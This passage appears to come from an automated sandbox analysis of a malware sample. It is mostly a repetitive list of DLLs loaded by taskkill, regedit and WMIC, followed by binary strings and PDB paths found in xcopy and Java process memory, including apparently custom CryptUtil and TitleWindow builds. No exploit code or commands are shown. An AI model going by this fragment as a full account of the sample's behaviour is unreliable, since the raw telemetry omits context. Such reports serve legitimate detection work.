        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: authz.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: aclui.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: clb.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ntdsapi.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
